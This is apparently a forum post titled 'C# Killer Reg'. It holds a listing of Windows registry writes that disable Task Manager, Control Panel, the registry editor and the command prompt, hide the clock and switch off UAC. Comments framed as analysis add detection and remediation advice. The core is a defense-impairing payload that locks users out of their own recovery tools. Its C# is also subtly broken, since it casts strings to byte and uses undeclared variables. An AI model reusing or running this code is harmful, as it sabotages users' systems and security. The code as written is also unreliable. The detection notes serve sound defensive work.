C# Killer Reg


Offline Omega

« on: March 14, 2022, 09:34:38 AM »
Killer Reg

Code
// Analyst summary: a straight-line run of Win32 registry calls (RegOpenKeyEx /
// RegCreateKeyEx / RegSetValueEx / RegCloseKey) that writes six policy values:
// five under HKEY_CURRENT_USER and one (EnableLUA) under HKEY_LOCAL_MACHINE.
// Together they hide or block the tools a user would reach for to inspect or
// undo changes (Task Manager, Control Panel, regedit, cmd) and turn off UAC.
// No return code is checked anywhere, and hKey / value are declared outside
// this listing, so the data written for the two REG_DWORD values is not shown.
//
// Detection: alert on registry value-set telemetry for these key paths and value
// names (e.g. Sysmon Event ID 13, or Security event 4657 where the key has an
// audit SACL), especially when the writer is not a Group Policy component.
// Relevant ATT&CK techniques: T1112 (Modify Registry), T1562.001 (Impair
// Defenses: Disable or Modify Tools).
// Remediation: delete the values or re-apply the intended policy through Group
// Policy, then identify the process that wrote them.

// Disable TaskManager
// Writes value "DisableTaskMgr" under the per-user Policies\System key.

   RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableTaskMgr", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable Control Panel
   // Writes value "NoControlPanel" under the per-user Policies\Explorer key.

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "NoControlPanel", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Hide Clock
   // Writes value "HideClock" under the same Policies\Explorer key; cosmetic on its own,
   // but a useful corroborating indicator when seen together with the other values here.

   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "HideClock", 0, REG_SZ, (byte)"1", "1".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable UAC
   // The only HKEY_LOCAL_MACHINE write in the listing: value "EnableLUA" under Policies\System.
   // NOTE(review): writing under HKLM normally needs an elevated token, so a successful
   // change here implies the writing process already ran with administrative rights.
   // Highest-priority alert of the set: a change to EnableLUA outside managed policy.

   RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "EnableLUA", 0, REG_SZ, (byte)"0", "0".Length * sizeof(char));
   RegCloseKey(hKey);

   // Disable Registry
   // First call creates the per-user Policies\System key if it is absent (non-volatile,
   // read + set-value access) and closes it again; the key is then reopened for the write.

   RegCreateKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, null, REG_OPTION_NON_VOLATILE, KEY_READ | KEY_SET_VALUE, null, hKey, 0);
   RegCloseKey(hKey);

   // Writes value "DisableRegistryTools" as REG_DWORD from `value` (defined outside this listing).
   // Incident-response note: with registry tools blocked for the user, cleanup may need to be
   // done through Group Policy or from another administrative context.
   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableRegistryTools", 0, REG_DWORD, (byte) & value, sizeof(value));
   RegCloseKey(hKey);

   // Disable CMD
   // Same create-then-reopen pattern, this time on HKCU\SOFTWARE\Policies\Microsoft\Windows\System.
   // Creation of this key by a non-policy process is itself worth logging.

   RegCreateKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Policies\\Microsoft\\Windows\\System", 0, null, REG_OPTION_NON_VOLATILE, KEY_READ | KEY_SET_VALUE, null, hKey, 0);
   RegCloseKey(hKey);

   // Writes value "DisableCMD" as REG_DWORD from the same out-of-view `value`.
   RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\Policies\\Microsoft\\Windows\\System", 0, KEY_SET_VALUE, hKey);
   RegSetValueEx(hKey, "DisableCMD", 0, REG_DWORD, (byte) & value, sizeof(value));
   RegCloseKey(hKey);
